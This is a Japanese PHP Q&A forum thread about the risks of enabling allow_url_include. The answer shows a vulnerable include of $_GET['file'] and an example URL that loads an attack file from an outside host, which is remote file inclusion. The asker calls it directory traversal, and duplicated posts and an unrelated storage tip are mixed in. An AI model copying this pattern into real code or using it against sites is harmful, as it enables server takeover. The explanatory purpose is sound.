allow_url_include - PHPプロ!Q&A掲示板
キーワード / allow_url_include セキュリティ php.ini
allow_url_includeをONにすると、どのようなセキュリティに影響を及ぼすのでしょうか?
この質問への意見の募集は締め切られ、ポイントは既に配分されました。
意見を投稿することはできますが、ポイントを受け取ることはできません。
ツリー一覧
回答一覧
A01
answerertmogmni [8月3日 00:53]
マニュアルを見るとphp6から設定可能とのことなので試していませんが、
<?php
include $_GET['file'];
?>
とかいうinclude.phpがあった場合、
http://www.example.com/include.php?file=http://どこか外部サイトの/攻撃用.txt
とすることで、include.phpは
<?php
include 'http://どこか外部サイトの/攻撃用.txt';
?>
となり、攻撃用.txtが読み込まれてしまうと思います。
<?php
include $_GET['file'];
?>
とかいうinclude.phpがあった場合、
http://www.example.com/include.php?file=http://どこか外部サイトの/攻撃用.txt
とすることで、include.phpは
<?php
include 'http://どこか外部サイトの/攻撃用.txt';
?>
となり、攻撃用.txtが読み込まれてしまうと思います。
A01-1
replyerJJkbs [8月26日 06:07]
ご回答ありがとうございました。
ディレクトリトラバーサルの危険性が増す訳ですね。
それと、ちょっと調べたのですがこれってallow_url_fopenのinclude/requireを別にしたものなんですね。
ディレクトリトラバーサルの危険性が増す訳ですね。
それと、ちょっと調べたのですがこれってallow_url_fopenのinclude/requireを別にしたものなんですね。
ページのトップへ
一つの目安として、ECサイトの購入情報など絶対に消えてはいけないものはDBに、カートなどの一時的に使用する情報や、ユーザに任意のタイミングで消去されても構わないものはセッションにと使い分けるといいでしょう。